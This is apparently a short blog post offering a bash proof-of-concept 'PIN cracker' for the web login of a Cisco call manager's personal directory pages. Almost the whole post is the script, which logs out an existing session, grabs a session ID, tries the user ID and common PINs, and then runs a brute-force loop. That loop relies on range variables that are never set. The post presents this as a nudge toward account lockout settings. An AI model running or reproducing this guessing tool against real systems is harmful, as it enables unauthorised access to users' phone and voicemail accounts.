As a follow up to the work done by Roberto SL here;
I've gone ahead and wrote some quick-and-dirty PoC code for this. Might be useful as a tool to remind people to use account lockout thresholds...
I've gone ahead and wrote some quick-and-dirty PoC code for this. Might be useful as a tool to remind people to use account lockout thresholds...
1: #!/bin/bash
2: echo "Cisco VoIP Phone Pin Cracker, 2015 PWH"
4: if [ "$#" -eq 0 ]; then
5: echo "Usage: $0 <ip> <user-id>"
6: exit
7: fi
9: userid=$2
10: ccmip=$1
12: echo -e "Targeting user id $userid on $ccmip\n"
13: echo "Checking if already logged in... "
14: curl "https://$ccmip/ccmpd/" -ks | grep -q 'Personal Address Book'
16: if [ `echo $?` -eq 0 ]; then
17: echo -n "+ IP already logged in, logging out... "
18: curl -ks `curl -ks "\`curl "https://$ccmip/ccmpd/" -ks | grep LogoutPage | cut -d\> -f2 | cut -d\< -f1\`" | grep logout | cut -d\> -f2 | cut -d\< -f1` > /dev/null
19: echo "Done"
20: else
21: echo "+ IP not logged in, proceeding to crack $userid..."
22: fi
24: echo -ne "Grabbing a SID... "
25: SID=`curl "https://$ccmip/ccmpd/" -ks | grep sid | cut -d\= -f2 | cut -d\< -f1`
26: echo $SID
28: function authattempt {
29: curl -ks "https://$ccmip/ccmpd/$SID&userid=$userid&pin=$1" | grep -q 'Login Unsuccessful'
30: if [ `echo $?` -eq 0 ]; then
31: echo -ne "$1 didn't work\\r"
32: else
33: echo "$1 worked "
34: exit
35: fi
36: }
38: echo "Testing user-id as PIN... "
39: authattempt $userid
40: echo "Testing common PINs... "
41: authattempt 1234
42: authattempt 4321
43: authattempt 0000
44: authattempt 1111
45: authattempt 2222
46: authattempt 3333
47: authattempt 4444
48: authattempt 5555
49: authattempt 6666
50: authattempt 7777
51: authattempt 8888
52: authattempt 9999
53: authattempt 0123
54: echo "Bruteforcing range... "
55: seq -f "%04.f" $rangeBegin $rangeEnd | while read line; do authattempt $line; done